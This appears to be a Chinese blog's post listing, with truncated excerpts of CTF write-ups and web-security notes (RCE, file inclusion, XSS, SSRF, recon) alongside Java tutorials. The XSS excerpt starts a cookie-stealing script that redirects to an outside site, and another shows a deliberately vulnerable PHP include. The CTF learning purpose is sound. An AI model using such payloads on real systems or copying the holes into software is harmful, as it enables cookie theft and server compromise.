远程命令执行--RuntimeExec 代码: public class RuntimeExec { @RequestMapping("/runtime") public String RuntimeExec(Strin…
CTFLOG-文件包含 ctfshow
文件包含 ctfshow web78: 示例代码 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ h…
CTFLOG-nodejs ctfshow
nodejs ctfshow web334: 打开题目之后给了一个zip的源码 打开题目环境之后给的是一个登录界面 分析zip源码 user.js items: [ {username: 'CTFSHOW',…
CTFLOG-XSS ctfshow
XSS ctfshow web316: 第一关没有任何过滤,直接存储形xss把cookie发送到咱们站点 <script>document.location.href='https://bk.tlli.top…
WEB安全-常见的RCE以及ByPass
常见的RCE以及ByPass 一、RCE漏洞 远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理:服务器没有对执行命令的函数进行过滤,导致命令被执行。 二、…
WEB安全-SSRF服务端请求伪造
SSRF服务端请求伪造 漏洞原理: Server-Side Request Forgery (SSRF,服务器端请求伪造) 漏洞是一种安全漏洞,允许攻击者向服务器发起欺骗性请求。攻击者利用这种漏洞可以探测、…
WEB安全-信息打点
信息打点 常见的资产搜集方法: 1,企业信息资产搜集,如(爱企查,企查查,企信宝,小蓝本,天眼查) 2,备案信息查询 3,ip反查,证书查询,域名注册查询 4,网络空间如(fofa,360,全球鹰,shodan,钟馗之眼…
JAVA-WEB mybatis框架
mybatis框架 快速入门 示例:查询user表所有的数据 步骤: 1,创建user表,添加数据 2,创建模块,导入坐标 3,编写Mybatis核心配置文件,替换连接信息,解决硬编码问题 4,编写SQL映…
JAVA-基础 反射
反射 反射:加载类,并允许以编程的方式解剖类中的各种成分,成员变量,方法,构造器等等; 反射的作用,反射主要还是用来做框架 反射学什么?学习获取类的信息并操作他们 1,反射第一步,加载类,获取类的字节码,c…
JAVA-基础 junit单元测试
单元测试 什么是单元测试:就是针对最小的单位进行测试代码和正确性测试 junit单元测试框架的有点:可以灵活的编写测试代码,可以针对某个方法进行测试也支持一件完成全部方法的自动化测试,且各自独立  …